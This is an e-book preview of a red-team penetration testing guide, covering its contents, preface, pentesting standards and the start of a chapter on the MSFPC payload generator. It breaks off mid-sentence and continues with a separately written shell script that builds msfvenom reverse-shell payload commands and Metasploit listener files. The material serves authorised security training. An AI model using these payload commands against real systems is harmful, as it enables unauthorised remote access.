Hands-On Red Team Tactics - Himanshu Sharma - E-Book

Hands-On Red Team Tactics E-Book

Himanshu Sharma

Description

Your one-stop guide to learning and implementing Red Team tactics effectively

Key Features

  • Target a complex enterprise environment in a Red Team activity
  • Detect threats and respond to them with a real-world cyber-attack simulation
  • Explore advanced penetration testing tools and techniques

Book Description

Red Teaming is used to enhance security by performing simulated attacks on an organization in order to detect network and system vulnerabilities. Hands-On Red Team Tactics starts with an overview of pentesting and Red Teaming, before introducing a few of the latest pentesting tools. We will then move on to exploring Metasploit and getting to grips with Armitage. Once you have studied the fundamentals, you will learn how to use Cobalt Strike and how to set up its team server.

The book introduces some common but lesser-known techniques for pivoting and how to pivot over SSH, before using Cobalt Strike to pivot. This comprehensive guide demonstrates advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. All this will help you achieve persistence using beacons and perform data exfiltration, and will also give you the chance to run through the methodology for using Red Team tools such as Empire during a Red Team activity against Active Directory and a Domain Controller.

In addition to this, you will explore maintaining persistent access, staying untraceable, and getting reverse connections over different C2 covert channels.

By the end of this book, you will have learned about advanced penetration testing tools, techniques to get reverse shells over encrypted channels, and processes for post-exploitation.

What you will learn

  • Get started with red team engagements using lesser-known methods
  • Explore intermediate and advanced levels of post-exploitation techniques
  • Get acquainted with all the tools and frameworks included in the Metasploit framework
  • Discover the art of getting stealthy access to systems via Red Teaming
  • Understand the concept of redirectors to add further anonymity to your C2
  • Get to grips with different uncommon techniques for data exfiltration

Who this book is for

Hands-On Red Team Tactics is for you if you are an IT professional, pentester, security consultant, or ethical hacker interested in the IT security domain and want to go beyond Penetration Testing. Prior knowledge of penetration testing is beneficial.


Pages: 250

Year published: 2018




Hands-On Red Team Tactics

A practical guide to mastering Red Team operations

Himanshu Sharma
Harpreet Singh

BIRMINGHAM - MUMBAI

Hands-On Red Team Tactics

Copyright © 2018 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the authors, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Commissioning Editor: Vijin Boricha
Acquisition Editor: Rohit Rajkumar
Content Development Editor: Ronn Kurien
Technical Editor: Prachi Sawant
Copy Editor: Safis Editing
Project Coordinator: Jagdish Prabhu
Proofreader: Safis Editing
Indexer: Tejal Daruwale Soni
Graphics: Tom Scaria
Production Coordinator: Deepika Naik

First published: September 2018

Production reference: 1270918

Published by Packt Publishing Ltd. Livery Place 35 Livery Street Birmingham B3 2PB, UK.

ISBN 978-1-78899-523-8

www.packtpub.com

mapt.io

Mapt is an online digital library that gives you full access to over 5,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website.

Why subscribe?

Spend less time learning and more time coding with practical eBooks and Videos from over 4,000 industry professionals

Improve your learning with Skill Plans built especially for you

Get a free eBook or video every month

Mapt is fully searchable

Copy and paste, print, and bookmark content

Packt.com

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.packt.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at [email protected] for more details.

At www.packt.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks. 

Contributors

About the authors

Himanshu Sharma has already achieved fame for finding security loopholes and vulnerabilities in Apple, Google, Microsoft, Facebook, Adobe, Uber, AT&T, Avira, and many more with hall of fame listings. He has helped celebrities such as Harbhajan Singh in recovering their hacked accounts, and also assisted an international singer in recovering his hacked accounts. He was a speaker at the international conference Botconf '13, CONFidence 2018 and RSA Singapore 2018. He also spoke at IEEE Conference as well as for TedX. Currently, he is the cofounder of BugsBounty, a crowd-sourced security platform.

Harpreet Singh has more than 5 years' experience in the field of ethical hacking, penetration testing, and red teaming. In addition, he has performed red-team engagements at multinational banks and companies. Harpreet is an Offensive Security Certified Professional (OSCP) and Offensive Security Wireless Professional (OSWP). He has trained 1500+ students, including government officials, on international projects.

About the reviewers

Nipun Jaswal is an international cyber security author and an award-winning IT security researcher with a decade of experience in penetration testing, vulnerability assessments, surveillance and monitoring solutions, and RF and wireless hacking. He has authored Metasploit Bootcamp, Mastering Metasploit, and Mastering Metasploit, Second Edition, and coauthored the Metasploit Revealed set of books. He has authored numerous articles and exploits that can be found in popular security databases such as Packet Storm and Exploit-DB. Please feel free to contact him at @nipunjaswal.

Ashwin Iyer is an M.Tech graduate in Information Security and Computer Forensics with a bachelor's degree in computer science and more than 5 years of experience in cyber security. He has exposure to penetration testing and infrastructure security.

He is currently working at SAP ARIBA as a Red Team Lead. He has experience in infrastructure security and in hardening the underlying technology, OS, and devices, and is also experienced in web and network pentesting in both the e-commerce and software product domains.

He holds professional certifications including GIAC GSEC #35151 (SANS), OSCP (OS-13175), ISO 27001:2013, ITILv3 2011 Foundation, Certified Ethical Hacker (CEHv7), and CISRA.

Packt is searching for authors like you

If you're interested in becoming an author for Packt, please visit authors.packtpub.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.

Table of Contents

Title Page

Copyright and Credits

Hands-On Red Team Tactics

Packt Upsell

Why subscribe?

Packt.com

Contributors

About the authors

About the reviewers

Packt is searching for authors like you

Preface

Who this book is for

What this book covers

To get the most out of this book

Download the color images

Conventions used

Get in touch

Reviews

Disclaimer

Red-Teaming and Pentesting

Pentesting 101

OWASP

Open Source Security Testing Methodology Manual (OSSTMM)

Information Systems Security Assessment Framework (ISSAF)

Penetration Testing Execution Standard (PTES)

Pre-engagement interactions

Intelligence gathering

Threat modeling

Vulnerability analysis

Exploitation

Post-exploitation

Reporting

A different approach

Methodology

How is it different?

Summary

Questions

Further reading

Pentesting 2018

Technical requirements

MSFvenom Payload Creator

Resource file

Koadic

Installation

Why use MSHTA as the dropper payload?

Terminology

Stager establishment

Payload execution

Running Implants

Pivoting

Summary

Questions

Further reading

Foreplay - Metasploit Basics

Technical requirements

Installing Metasploit

Running Metasploit

Auxiliaries

Exploits

Payloads

Encoders

Meterpreter

Armitage and team server

Metasploit with slack

Armitage and Cortana scripts

Summary

Questions

Further reading

Getting Started with Cobalt Strike

Technical requirements

Planning a red-team exercise

Cyber kill chain (CKC)

Reconnaissance

Weaponization

Delivery

Exploitation

Installation

Command and Control Server

Actions

Objective and goal

Rules of Engagement (RoE)

Scenario/strategy

Deliverables

Introduction to Cobalt Strike

What is a team server?

Cobalt Strike setup

Cobalt Strike interface

Toolbar

Connecting to another team server

Disconnecting from the team server

Configure listeners

Session graphs

Session table

Targets list

Credentials

Downloaded files

Keystrokes

Screenshots

Payload generation – stageless Windows executable

Payload generation – Java signed applet

Payload generation – MS Office macros

Scripted web delivery

File hosting

Managing the web server

Server switchbar

Customizing the team server

Summary

Questions

Further reading

./ReverseShell

Technical requirement

Introduction to reverse connections

Unencrypted reverse connections using netcat

Encrypted reverse connections using OpenSSL

Introduction to reverse shell connections

Unencrypted reverse shell using netcat

Encrypted reverse shell for *nix with OpenSSL packages installed

Encrypted reverse shell using ncat

Encrypted reverse shell using socat

Encrypted reverse shell using cryptcat

Reverse shell using powercat

reverse_tcp

reverse_tcp_rc4

reverse_https

reverse_https with a custom SSL certificate

Meterpreter over ngrok

Reverse shell cheat sheet

Bash reverse shell

Zsh reverse shell

TCLsh/wish reverse shell

Ksh reverse shell

Netcat reverse shell

Telnet reverse shell

(G)awk reverse shell

R reverse shell

Python reverse shell

Perl reverse shell

Ruby reverse shell

Php reverse shell

Lua reverse shell

Nodejs reverse shell

Powershell reverse shell

Socat reverse shell over TCP

Socat reverse shell over UDP

Socat reverse shell over SSL (cert.pem is the custom certificate)

Summary

Questions

Further reading

Pivoting

Technical requirements

Pivoting via SSH

Meterpreter port forwarding

Pivoting via Armitage

Multi-level pivoting

Summary

Further reading

Age of Empire - The Beginning

Technical requirements

Introduction to Empire

Empire setup and installation

Empire fundamentals

Phase 1 – Listener Initiation

Phase 2 – Stager Creation

Phase 3 – Stager Execution

Phase 4 – Acquiring Agent

Phase 5 – Post Module Operations

Empire post exploitation for Windows

Empire post exploitation for Linux

Empire post exploitation for OSX

Popping up a Meterpreter session using Empire

Slack notification for Empire agents

Summary

Questions

Further reading

Age of Empire - Owning Domain Controllers

Getting into a Domain Controller using Empire

Automating Active Directory exploitation using the DeathStar

Empire GUI

Summary

Questions

Further reading

Cobalt Strike - Red Team Operations

Technical requirements

Cobalt Strike listeners

Foreign-based listeners

Cobalt Strike payloads

Beacons

The beacon menu

Explore menu

Beacon console

Pivoting through Cobalt Strike

Aggressor Scripts

Summary

Questions

Further reading

C2 - Master of Puppets

Technical requirements

Introduction to C2

Cloud-based file sharing using C2

Using Dropbox as the C2

Using OneDrive as the C2

C2 covert channels

TCP

UDP

HTTP(S)

DNS

ICMP

Summary

Questions

Further reading

Obfuscating C2s - Introducing Redirectors

Technical requirements

Introduction to redirectors

Obfuscating C2 securely

Short-term and long-term redirectors

Redirection methods

Dumb pipe redirection

Filtration/smart redirection

Domain fronting

Summary

Questions

Further reading

Achieving Persistence

Technical requirements

Persistence via Armitage

Persistence via Empire

Persistence via Cobalt Strike

Summary

Further reading

Data Exfiltration

Technical requirements

Exfiltration basics

Exfiltration via Netcat

Exfiltration via OpenSSL

Exfiltration with PowerShell

CloakifyFactory

Running CloakifyFactory on Windows

Data exfiltration via DNS

Data exfiltration via Empire

Summary

Questions

Further reading

Assessment

Chapter 1: Red-Teaming and Pentesting

Chapter 2: Pentesting 2018

Chapter 3: Foreplay – Metasploit Basics

Chapter 4: Getting Started with Cobalt Strike

Chapter 5: ./ReverseShell

Chapter 7: Age of Empire – The Beginning

Chapter 8: Age of Empire – Owning Domain Controllers

Chapter 9: Cobalt Strike – Red Team Operations

Chapter 10: C2 – Master of Puppets

Chapter 11: Obfuscating C2s – Introducing Redirectors

Chapter 13: Data Exfiltration

Other Books You May Enjoy

Leave a review - let other readers know what you think

Preface

Red Teaming is used to enhance security by performing simulated attacks on an organization in order to detect network and system vulnerabilities. Hands-On Red Team Tactics starts with an overview of pentesting and Red Teaming, before introducing a few of the latest pentesting tools. You will then move on to exploring Metasploit and getting to grips with Armitage. Once you have studied the basics, you will learn the fundamentals and usage of Cobalt Strike and how to set up its team server.

You will discover some common but lesser-known techniques for pivoting and how to pivot over SSH, before using Cobalt Strike to pivot. This comprehensive guide demonstrates advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. All this will help you achieve persistence using Beacons and perform data exfiltration, and will also give you the chance to run through the methodology for using Red Team tools such as Empire during a Red Team activity against Active Directory and a Domain Controller.

By the end of the book, you will have learned about advanced penetration testing tools, techniques for getting reverse shells over encrypted channels, and processes for post-exploitation. In addition, you will explore frameworks such as Empire, which cover maintaining persistent access, staying untraceable, and getting reverse connections over different C2 covert channels.

Who this book is for

Hands-On Red Team Tactics is for you if you are an IT professional, pentester, security consultant, or ethical hacker interested in the IT security domain and want to go beyond Penetration Testing. Prior knowledge of penetration testing is beneficial.

What this book covers

Chapter 1, Red-Teaming and Pentesting, helps you understand the different pentesting standards followed across the industry and goes through the seven phases of the PTES standard in detail.

Chapter 2, Pentesting 2018, introduces you to MSFvenom Payload Creator (MSFPC). We will also look at the use of the resource files that MSFPC generates alongside the payload file.

Chapter 3, Foreplay – Metasploit Basics, teaches you about the team server and the Armitage client, including the setup and usage of Armitage.

Chapter 4, Getting Started with Cobalt Strike, starts by exploring the red-team exercise as well as the concept of the cyber kill chain, which can be used for an attack plan. The chapter then introduces you to Cobalt Strike, the tool that is used for red-team operations.

Chapter 5, ./ReverseShell, explores what reverse connections and reverse shell connections are, using various tools. Furthermore, we will try different payloads to get reverse shell connections using Metasploit.

Chapter 6, Pivoting, dives into port forwarding and its uses. We will also learn about pivoting and its uses, followed by methods of port forwarding via SSH.

Chapter 7, Age of Empire – The Beginning, introduces you to Empire and its fundamentals. We will also cover Empire's basic usage and the post-exploitation basics for Windows, Linux, and OSX.

Chapter 8, Age of Empire – Owning Domain Controllers, delves into some more advanced uses of the Empire tool to get access to the Domain Controller.

Chapter 9, Cobalt Strike – Red Team Operations, teaches you about the listener module of Cobalt Strike along with its types and usage.

Chapter 10, C2 – Master of Puppets, provides an introduction to command and control (C2) servers and discusses how they are used in a red-team operation.

Chapter 11, Obfuscating C2s – Introducing Redirectors, introduces you to redirectors and the reasons why obfuscating C2s is required. We also cover how to obfuscate C2s securely so that they are protected from detection by the Blue team.

Chapter 12, Achieving Persistence, dives into achieving persistence using Armitage's inbuilt exploit modules, and then shows how to do the same via Empire on Windows, Linux, and macOS machines.

Chapter 13, Data Exfiltration, discusses some basic ways of transferring data using simple tools such as Netcat, OpenSSL, and PowerShell. Next, we look at transforming the data using text-based steganography to avoid detection, as well as the usage of the CloakifyFactory tool.

To get the most out of this book

Readers should have prior knowledge of networking basics, basic Linux commands, and penetration testing standards, and hands-on experience with tools such as Metasploit, Nmap, and so on.

The readers should have at least Linux installed for Red Team Engagement. Kali is recommended as it comes with pre-configured tools.

Download the color images

We also provide a PDF file that has color images of the screenshots/diagrams used in this book. You can download it here: https://www.packtpub.com/sites/default/files/downloads/9781788995238_ColorImages.pdf.

Conventions used

There are a number of text conventions used throughout this book.

CodeInText: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "Let's try to use the backdoor_lnk module by typing info."

Any command-line input or output is written as follows:

git clone https://github.com/g0tmi1k/mpc

Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example: "Click the Add an app button to add an application."

Warnings or important notes appear like this.
Tips and tricks appear like this.

Get in touch

Feedback from our readers is always welcome.

General feedback: If you have questions about any aspect of this book, mention the book title in the subject of your message and email us at [email protected].

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packt.com/submit-errata, selecting your book, clicking on the Errata Submission Form link, and entering the details.

Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.

Reviews

Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at Packt can understand what you think about our products, and our authors can see your feedback on their book. Thank you!

For more information about Packt, please visit packt.com.

Disclaimer

The information within this book is intended to be used only in an ethical manner. Do not use any information from the book if you do not have written permission from the owner of the equipment. If you perform illegal actions, you are likely to be arrested and prosecuted to the full extent of the law. Packt Publishing does not take any responsibility if you misuse any of the information contained within the book. The information herein must only be used while testing environments with proper written authorizations from appropriate persons responsible.

Red-Teaming and Pentesting

Pentesting is a simulated attack on a computer system, carried out to evaluate the security of the system or network. The test is performed to identify vulnerabilities and the risks they pose.

The 1960s marked the true beginning of the age of computer security. In this chapter, we will cover the widely used pentesting methodology as well as the red-teaming approach, which is now being adopted across many organizations.

In this chapter, we will cover the following topics:

Pentesting 101

A different approach

Pentesting 101

Penetration testing is usually carried out against a standard. There are several, such as the Open Web Application Security Project (OWASP) Testing Guide, the Open Source Security Testing Methodology Manual (OSSTMM), the Information Systems Security Assessment Framework (ISSAF), and so on. Most of them follow the same broad methodology, with the phases named differently. We will take a brief look at each of them in the following sections and cover the Penetration Testing Execution Standard (PTES) in detail.

OWASP

OWASP is a worldwide not-for-profit charitable organization that focuses on improving the security of software.

It's a community of like-minded professionals who release software and knowledge-based documentation on application security, covering such subjects as:

Information gathering

Configuration and deployment management testing

Identity management testing

Authentication testing

Authorization testing

Session management testing

Input validation testing

Error handling

Cryptography

Business logic testing

Client-side testing

Open Source Security Testing Methodology Manual (OSSTMM)

As mentioned on their official website, this is a peer-reviewed manual of security testing and analysis, providing verified facts. These facts provide actionable information that can measurably improve your operational security.

The OSSTMM includes the following key sections:

Operational security metrics

Trust analysis

Work flow

Human security testing

Physical security testing

Wireless security testing

Telecommunications security testing

Data networks security testing

Compliance regulations

Reporting with the Security Test Audit Report (STAR)

Information Systems Security Assessment Framework (ISSAF)

The ISSAF project is no longer very active, but the guide it produced is quite comprehensive. It aims to evaluate an organization's information security policies and processes for compliance with IT industry standards, laws, and regulatory requirements. The current version of ISSAF is 0.2.

The stages that it covers can be found at https://www.owasp.org/index.php/Penetration_testing_methodologies.

Penetration Testing Execution Standard (PTES)

PTES is the most widely used of these standards and covers almost everything related to pentesting.

PTES is divided into the following seven phases:

Pre-engagement interactions

Intelligence gathering

Threat modeling

Vulnerability analysis

Exploitation

Post-exploitation

Reporting

Let's take a brief look at what each of these phases involves.

Pre-engagement interactions

These are the processes carried out before the activity kicks off, such as defining the scope, which usually involves listing the in-scope network IP ranges, web applications, wireless networks, and so on.

Once scoping is done, lines of communication are established between the client and the testing team, and the incident-reporting process (how a real incident discovered during the test is escalated) is finalized. These interactions also cover status updates, calls, legal processes such as the written authorization, and the start and end dates of the project.

Intelligence gathering

This is the process of gathering as much information as possible about the target. It is the most critical part of pentesting: the more information we have, the more attack vectors we can plan. In a white-box engagement, this information is provided to the testing team up front.

Threat modeling

The threat model depends on the amount of information gathered. Based on that, the activity can be broken down and performed using automated tools, logical attacks, and so on. The following diagram illustrates an example mind map of a threat model:

Vulnerability analysis

This is the process of discovering flaws that an attacker could use. These flaws can be anything from open ports and service misconfigurations to SQL injection. Many tools are available to help with vulnerability analysis, including Nmap, Acunetix, and Burp Suite, and new ones are released every few weeks.

Exploitation

This is the process of gaining access to a system by bypassing its protection mechanisms, using the findings of the vulnerability analysis. The exploits used can be public or zero-day.

Post-exploitation

This is the process of determining the criticality of the compromise (what the access actually gives an attacker) and then maintaining access for later use. This phase must always follow the rules of engagement, which protect both the client and ourselves; any cleanup or covering of tracks is done only as the engagement requires.

Reporting

This is one of the most important phases, as the patching of all the issues totally depends on the details presented in the report. The report must contain three key elements:

Criticality of the bug

Steps of reproduction of the bug

Patch suggestions

In summary, the pentest life cycle phases are presented in the following diagram:

A different approach

Let's discuss a different approach: red-teaming. The main objective of red-teaming is to assess and obtain the real level of risk a company has at that moment in time. In this activity, networks, applications, physical security, and people (through social engineering) are all tested for weaknesses.

Red-teaming can also be considered as a simulation of a real-world hack.

Methodology

Red-teaming uses the PTES standard as its foundation, but there is much more to it. A penetration test is performed with the aim of finding as many vulnerabilities as possible in the given amount of time, whereas a red-team engagement is performed with a single goal and with an emphasis on staying discreet.

The methodology used in a red-team activity involves the following:

Reconnaissance

Compromise

Persistence

Command and control

Privilege escalation

Pivoting

Reporting and cleanup

The following cycle basically repeats for every new piece of information that is found about the client until the goal is met:

How is it different?

Let's look at it with a different perspective to get a clearer picture:

Looking at the preceding diagram, we can see that red-teaming involves using every means to achieve the goals. We can summarize the major difference between red-teaming and pentesting as follows:

Red-teaming involves finding and exploiting only those vulnerabilities that help achieve the goal, whereas pentesting involves finding and exploiting vulnerabilities within the given scope, which is limited to digital assets

Red-teaming has an extremely flexible methodology, whereas pentesting follows fixed, static methods

During red-teaming, the organization's security team is not informed (beyond the small group that authorized the exercise), whereas during pentesting, the security team is notified

Red-teaming attacks can happen 24/7, while pentesting activities are mostly limited to office hours

Red-teaming is more about measuring the business impact of the vulnerabilities, whereas pentesting is about finding and exploiting vulnerabilities.

Summary

Wrapping up the chapter, we learned about different standards of pentesting followed across the industry, and we went through the seven phases of the PTES standard in detail. We also looked at red-teaming and how it is different from pentesting.

In the next chapter, we will look at a few of the latest post-exploitation tools and examine in detail how they work.

Questions

What are the different pentesting standards?

What are the different phases of PTES?

What is the difference between red-teaming and pentesting?

What are the key elements of a report?

What is the main objective of a red-team activity?

Further reading

For more information on the topics discussed in this chapter, please visit the following links:

High Level Organization of the Standard: http://www.pentest-standard.org/index.php/Main_Page

OSSTMM: http://www.isecom.org/mirror/OSSTMM.3.pdf

Web Application Penetration Testing: https://www.owasp.org/index.php/Web_Application_Penetration_Testing

Information Systems Security Assessment Framework (ISSAF): http://www.oissg.org/issaf02/issaf0.1-5.pdf

InfoSec Resources: https://resources.infosecinstitute.com/the-history-of-penetration-testing/#gref

Pentesting 2018

For the past few years, we have been using tools such as the Metasploit Framework, routersploit, LinuxEnum.sh, nmap, and so on for post-exploitation and scanning. New tools keep appearing, so it is worth learning about a few of them that can be used for post-exploitation. Of the many available, we will look at MSFvenom Payload Creator (MSFPC), a simple MSF-based payload generator, and Koadic, a COM-based Command and Control (C3) server that can be used for post-exploitation in red-team operations or penetration tests.

In this chapter, we will cover the following tools:

MSFPC

Koadic

Technical requirements

A *nix-based system (Kali, Ubuntu, or macOS)

The Metasploit Framework (needed for MSFPC)

Python 2 or 3 (needed for Koadic)

MSFvenom Payload Creator

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options. The user doesn't need to execute the long msfvenom commands to generate payloads anymore. With MSFPC, the user can generate the payloads with far fewer commands.

Before downloading the tool, Metasploit should be installed in the system. MSFPC is just a simple bash script, which means that it can be executed on *nix systems.

We can download the MSFPC package from https://github.com/g0tmi1k/mpc. We can either download the repository in a ZIP file or we can clone the repository on our local system by running the following command:

git clone https://github.com/g0tmi1k/mpc

After cloning the repo, give the msfpc.sh file execute permission. Running it without arguments prints its usage, which lists the argument order; the arguments in parentheses are optional:

cd mpc/
chmod +x msfpc.sh
./msfpc.sh
./msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

TYPE: The payload can be in any of the following formats (this option corresponds to the -f switch in msfvenom): APK [android], ASP, ASPX, Bash [.sh], Java [.jsp], Linux [.elf], OSX [.macho], Perl [.pl], PHP, Powershell [.ps1], Python [.py], Tomcat [.war], Windows [.exe // .dll].

DOMAIN/IP: This is the LHOST option when generating payloads in msfvenom.

PORT: This is the LPORT option when generating payloads in msfvenom.

CMD/MSF: This is the type of shell dropped once the payload is executed on the target system. CMD gives a standard command shell, that is, the Command Prompt (cmd.exe) on Windows and a terminal shell (/bin/bash) on *nix; MSF gives a Meterpreter session. In cases where the size of the shellcode matters, the classic reverse shell is the better choice, so CMD can be used in situations like these.

Generating a simple classic reverse shell payload can be done by executing the following command:

sh msfpc.sh cmd windows en0

The preceding command generates a Windows payload that drops a cmd shell, with LHOST set to the IP address of the en0 network interface (MSFPC resolves an interface name to its address):

As the screenshot shows, MSFPC created two files in the same directory:

The executable payload: windows-shell-staged-reverse-tcp-443.exe

The resource file: windows-shell-staged-reverse-tcp-443-exe.rc

The naming convention for the files is easy to understand, as they are named after the options used at creation time. We just created a Windows staged
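As an added example (this is not MSFPC's own code), the following shell script reconstructs the msfvenom command and the multi/handler resource file that an invocation such as ./msfpc.sh cmd windows 192.0.2.10 443 reverse staged tcp expands to, using the file-naming convention just described. The function names, the 192.0.2.10 documentation address, the 443 default port, and the restriction to Windows (-f exe) and 32-bit Linux (-f elf) targets are assumptions made for the example; the resource file is built from standard msfconsole commands rather than copied from MSFPC's generated .rc file.

```sh
#!/bin/sh
# Added example, not MSFPC's code. Reconstructs what an msfpc.sh call such as
#   ./msfpc.sh cmd windows 192.0.2.10 443 reverse staged tcp
# expands to: the msfvenom command and the matching multi/handler resource file.
# Assumptions: Windows payloads use -f exe, Linux payloads are 32-bit ELF (-f elf),
# LPORT defaults to 443, and file names follow
# <os>-<shell>-<staging>-<direction>-<transport>-<port>.<ext>.
# 192.0.2.10 is a documentation address, not a real listener.

# msf_payload OS cmd|msf reverse|bind staged|stageless tcp|http|https
# Staged payloads are "kind/direction_transport"; stageless ones fuse the
# parts with underscores ("kind_direction_transport").
msf_payload() {
    mp_os=$1; mp_shell=$2; mp_dir=$3; mp_staging=$4; mp_transport=$5
    case "$mp_os" in
        windows) mp_prefix=windows ;;
        linux)   mp_prefix=linux/x86 ;;
        *) echo "unsupported OS: $mp_os" >&2; return 1 ;;
    esac
    case "$mp_shell" in
        cmd) mp_kind=shell ;;
        msf) mp_kind=meterpreter ;;
        *) echo "unsupported shell type: $mp_shell" >&2; return 1 ;;
    esac
    # Plain command shells only speak raw TCP; HTTP(S) transports are a Meterpreter feature.
    if [ "$mp_kind" = shell ] && [ "$mp_transport" != tcp ]; then
        echo "cmd shells support only tcp, not $mp_transport" >&2; return 1
    fi
    if [ "$mp_staging" = staged ]; then
        printf '%s/%s/%s_%s\n' "$mp_prefix" "$mp_kind" "$mp_dir" "$mp_transport"
    else
        printf '%s/%s_%s_%s\n' "$mp_prefix" "$mp_kind" "$mp_dir" "$mp_transport"
    fi
}

# payload_filename OS SHELL DIRECTION STAGING TRANSPORT PORT
# e.g. windows-shell-staged-reverse-tcp-443.exe
payload_filename() {
    pf_os=$1; pf_shell=$2; pf_dir=$3; pf_staging=$4; pf_transport=$5; pf_port=$6
    case "$pf_shell" in cmd) pf_kind=shell ;; *) pf_kind=meterpreter ;; esac
    case "$pf_os" in windows) pf_ext=exe ;; *) pf_ext=elf ;; esac
    printf '%s-%s-%s-%s-%s-%s.%s\n' "$pf_os" "$pf_kind" "$pf_staging" "$pf_dir" "$pf_transport" "$pf_port" "$pf_ext"
}

# msfvenom_command OS SHELL IP PORT DIRECTION STAGING TRANSPORT
# Bind payloads listen on the target, so they carry no LHOST.
msfvenom_command() {
    mc_os=$1; mc_shell=$2; mc_ip=$3; mc_port=${4:-443}; mc_dir=$5; mc_staging=$6; mc_transport=$7
    mc_payload=$(msf_payload "$mc_os" "$mc_shell" "$mc_dir" "$mc_staging" "$mc_transport") || return 1
    mc_file=$(payload_filename "$mc_os" "$mc_shell" "$mc_dir" "$mc_staging" "$mc_transport" "$mc_port")
    case "$mc_os" in windows) mc_fmt=exe ;; *) mc_fmt=elf ;; esac
    if [ "$mc_dir" = reverse ]; then
        printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$mc_payload" "$mc_ip" "$mc_port" "$mc_fmt" "$mc_file"
    else
        printf 'msfvenom -p %s LPORT=%s -f %s -o %s\n' "$mc_payload" "$mc_port" "$mc_fmt" "$mc_file"
    fi
}

# handler_rc OS SHELL IP PORT DIRECTION STAGING TRANSPORT
# The msfconsole resource file that starts the matching handler as a background job.
# For a bind payload the handler connects out to the target, so it needs RHOST, not LHOST.
handler_rc() {
    hr_os=$1; hr_shell=$2; hr_ip=$3; hr_port=${4:-443}; hr_dir=$5; hr_staging=$6; hr_transport=$7
    hr_payload=$(msf_payload "$hr_os" "$hr_shell" "$hr_dir" "$hr_staging" "$hr_transport") || return 1
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$hr_payload"
    if [ "$hr_dir" = reverse ]; then
        printf 'set LHOST %s\n' "$hr_ip"
    else
        printf 'set RHOST %s\n' "$hr_ip"
    fi
    printf 'set LPORT %s\n' "$hr_port"
    printf 'set ExitOnSession false\n'
    printf 'run -j\n'
}

# Demo: the book's "cmd windows" case, with an explicit address instead of en0.
msfvenom_command windows cmd 192.0.2.10 443 reverse staged tcp
handler_rc windows cmd 192.0.2.10 443 reverse staged tcp
```

Save the handler output to a file and load it with msfconsole -r to start the listener before running the payload on the target. The script deliberately refuses cmd shells over HTTP(S): a plain shell payload has no HTTP transport, which is one of the reasons the book's MSF (Meterpreter) option exists.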